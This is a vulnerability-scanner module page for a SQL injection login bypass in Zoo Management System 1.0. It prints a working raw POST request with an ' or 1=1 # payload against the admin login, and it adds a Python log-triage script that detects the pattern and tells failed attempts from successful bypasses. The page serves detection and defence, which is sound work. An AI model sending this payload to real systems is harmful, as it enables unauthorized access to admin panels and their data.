Zoo Management System 1.0 - SQL Injection

By kannthu

Critical
Vidoc Module
#edb #auth-bypass #packetstorm #zms
Description

Zoo Management System 1.0 - SQL Injection

What is the "Zoo Management System 1.0 - SQL Injection" module?

The "Zoo Management System 1.0 - SQL Injection" module is designed to detect a SQL injection vulnerability in the Zoo Management System 1.0 software. This vulnerability allows an attacker to potentially access sensitive information from the database, modify data, and execute unauthorized actions. The severity of this vulnerability is classified as critical.

This module was authored by dwisiswant0.

Impact

A successful SQL injection attack on the Zoo Management System 1.0 can have severe consequences. It can lead to unauthorized access to sensitive data, such as user credentials, personal information, or financial records. Additionally, an attacker can manipulate the database, potentially causing data corruption or loss.

How does the module work?

The "Zoo Management System 1.0 - SQL Injection" module works by sending a crafted HTTP POST request to the target system. The request is designed to exploit the SQL injection vulnerability in the software. Here is an example of the request:

POST /zms/admin/index.php HTTP/1.1
Host: <Hostname>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Origin:
Referer: /zms/admin/index.php
Cookie: PHPSESSID=<randTextAlphanumeric(10)>

username=dw1%27+or+1%3D1+%23&password=dw1%27+or+1%3D1+%23&login=

The module then applies matching conditions to the response received from the target system. It checks if the response body contains the phrases "Zoo Management System || Dashboard" and "ZMS ADMIN". Additionally, it verifies that the response status code is 200.

If all matching conditions are met, the module reports the vulnerability.
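
The request and matching conditions above, turned around for log triage, as an added example that is not part of the Vidoc module or of Zoo Management System: it decodes a logged login body, flags the quote, tautology and comment pattern seen in the request, and uses the page's response conditions to separate attempts from successful bypasses. The regexes, function names and sample responses are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Request body copied from the module's example request on this page.
MODULE_BODY = "username=dw1%27+or+1%3D1+%23&password=dw1%27+or+1%3D1+%23&login="
# Constructed benign body (not from the page): apostrophe in a name, '#' in a password.
BENIGN_BODY = "username=o%27brien&password=Tr1cky%23Pass+or+not&login="

# Heuristic (assumption): a quote closing the string literal, then OR/AND and a
# comparison of a token with itself, e.g. ' or 1=1
TAUTOLOGY = re.compile(r"""['"]\s*(?:or|and)\s+(\w+)\s*=\s*\1\b""", re.IGNORECASE)
# MySQL comment markers that cut off the rest of the statement.
COMMENT = re.compile(r"#|--(?:\s|$)|/\*")
# Phrases the page says the module looks for in the response body.
DASHBOARD_MARKERS = ("Zoo Management System || Dashboard", "ZMS ADMIN")


def inspect_login_body(body, fields=("username", "password")):
    """Return {field: [reasons]} for login fields that look like SQL injection."""
    findings = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name not in fields:
            continue
        match = TAUTOLOGY.search(value)
        if match:
            reasons = ["tautology"]
            # Only a comment marker after the tautology truncates the query.
            if COMMENT.search(value, match.end()):
                reasons.append("comment-truncation")
            findings[name] = reasons
    return findings


def classify(request_body, status, response_body):
    """Triage one logged login exchange: 'clean', 'attempt' or 'bypass-succeeded'."""
    if not inspect_login_body(request_body):
        return "clean"
    landed = status == 200 and all(m in response_body for m in DASHBOARD_MARKERS)
    return "bypass-succeeded" if landed else "attempt"


if __name__ == "__main__":
    # Constructed responses: an admin dashboard page and a rejected login page.
    dashboard = "<title>Zoo Management System || Dashboard</title><h1>ZMS ADMIN</h1>"
    rejected = "<title>Zoo Management System || Login</title>Invalid Details"
    print(inspect_login_body(MODULE_BODY))
    print(classify(MODULE_BODY, 200, dashboard))
    print(classify(MODULE_BODY, 200, rejected))
    print(classify(BENIGN_BODY, 200, dashboard))
```

Pattern matching like this is for triage of logged requests only; the fix in the application is to build the login lookup as a parameterized query.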

Module preview

Concurrent Requests (1)
1. HTTP Request template
Raw request
Matching conditions
regex: Zoo Management System (\|\| Dashboard|@ ...and
status: 200
Passive global matcher
No matching conditions.
On match action
Report vulnerability